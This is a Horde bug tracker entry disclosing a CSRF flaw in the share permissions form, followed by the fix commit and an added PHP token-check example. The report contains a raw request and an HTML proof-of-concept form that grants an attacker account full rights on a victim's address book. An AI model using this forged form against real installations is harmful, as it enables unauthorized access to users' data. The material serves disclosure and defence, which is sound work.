
[#12804] CSRF in changing permissions functionality
Summary CSRF in changing permissions functionality
Queue Horde Groupware Webmail Edition
Queue Version 5.1.2
Type Bug
State Resolved
Priority 3. High
Owners jan (at) horde (dot) org
Requester m.benetrix (at) e-secure (dot) com (dot) au
Created 2013-10-28 (2639 days ago)
Due 11/05/2013 (2631 days ago)
Updated 2013-10-29 (2638 days ago)
Assigned
Resolved 2013-10-29 (2638 days ago)
Milestone
Patch No

History
2013-10-29 11:36:03 Jan Schneider Assigned to Jan Schneider
State ⇒ Resolved
 
2013-10-29 11:36:01 Git Commit Comment #2
Changes have been made in Git (master):

commit b79114d08ee8c8e43e74a179741749529f6d885c
Author: Jan Schneider <jan@horde.org>
Date:   Tue Oct 29 12:32:30 2013 +0100

     [jan] SECURITY: Protect against CSRF attacks on share permissions form (Bug #12804).

  horde/docs/CHANGES                  |    2 ++
  horde/package.xml                   |    4 +++-
  horde/services/shares/edit.php      |    5 +++++
  horde/templates/shares/edit.inc     |    1 +
  kronolith/docs/CHANGES              |    2 ++
  kronolith/package.xml               |    2 ++
  kronolith/perms.php                 |    5 +++++
  kronolith/templates/perms/perms.inc |    1 +
  8 files changed, 21 insertions(+), 1 deletions(-)

http://git.horde.org/horde-git/-/commit/b79114d08ee8c8e43e74a179741749529f6d885c
2013-10-28 23:18:33 m (dot) benetrix (at) e-secure (dot) com (dot) au Comment #1
Type ⇒ Bug
State ⇒ Unconfirmed
Priority ⇒ 3. High
Summary ⇒ CSRF in changing permissions functionality
Due ⇒ 2013-11-05
Queue ⇒ Horde Groupware Webmail Edition
Milestone ⇒
Patch ⇒ No
I found another one, a CSRF while a change of permissions is requested. It was found that this form misses a unique token.

Request:
POST /horde/services/shares/edit.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish


PoC

<html>

   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner&#95;input" value="kenedyK" />
       <input type="hidden"
name="u&#95;names&#91;&#124;&#124;new&#95;input&#93;"
value="AttackerUserName" />
       <input type="hidden"
name="u&#95;read&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;edit&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;delete&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="g&#95;names&#91;&#124;&#124;new&#93;"
value="" />
       <input type="hidden" name="save&#95;and&#95;finish"
value="Save&#32;and&#32;Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Conditions: The attacker must know the owner value which is the 
victim's username, and the ID of the address book. Once he gets them, 
he can launch the attack.
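
The report above says the share permissions form carries no unique token, and the commit in comment #2 adds CSRF protection to it. As an added illustration (not Horde's code and not the content of that commit), this is a per-session token check in PHP; the `csrf_token` field name, the function names and the array standing in for `$_SESSION` are assumptions.

```php
<?php
// Added example, not Horde's code. $session stands in for $_SESSION so the
// script runs from the CLI; the field name 'csrf_token' is an assumption.

/** Create the per-session secret once and return the token the form must echo back. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_secret'])) {
        $session['csrf_secret'] = random_bytes(32);
    }
    // Bind the token to one form so it cannot be replayed against another.
    return hash_hmac('sha256', 'shares/edit', $session['csrf_secret']);
}

/** True only if the POST carries the token issued to this session. */
function csrf_check(array $session, array $post): bool
{
    if (empty($session['csrf_secret']) || !isset($post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }
    $expected = hash_hmac('sha256', 'shares/edit', $session['csrf_secret']);
    return hash_equals($expected, $post['csrf_token']); // constant-time compare
}

/** Handle the permissions POST: refuse before touching any share. */
function handle_edit(array $session, string $body): int
{
    parse_str($body, $post);
    if (($post['actionID'] ?? '') === 'editform' && !csrf_check($session, $post)) {
        return 403;
    }
    return 200; // permissions would be updated here
}

// Constructed sample: the shape of the body in the report, shortened.
$forged = 'actionID=editform&cid=37&app=turba&u_read%5B%7C%7Cnew_input%5D=on';

$session = [];
$token   = csrf_token($session);   // rendered as a hidden <input> in the form

printf("cross-site POST without token: %d\n", handle_edit($session, $forged));
printf("POST with a guessed token:     %d\n",
    handle_edit($session, $forged . '&csrf_token=' . str_repeat('0', 64)));
printf("POST from the real form:       %d\n",
    handle_edit($session, $forged . '&csrf_token=' . $token));
```

A page on another origin can submit the form fields but cannot read the token rendered into the legitimate form, so knowing the owner name and address book ID is no longer sufficient.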
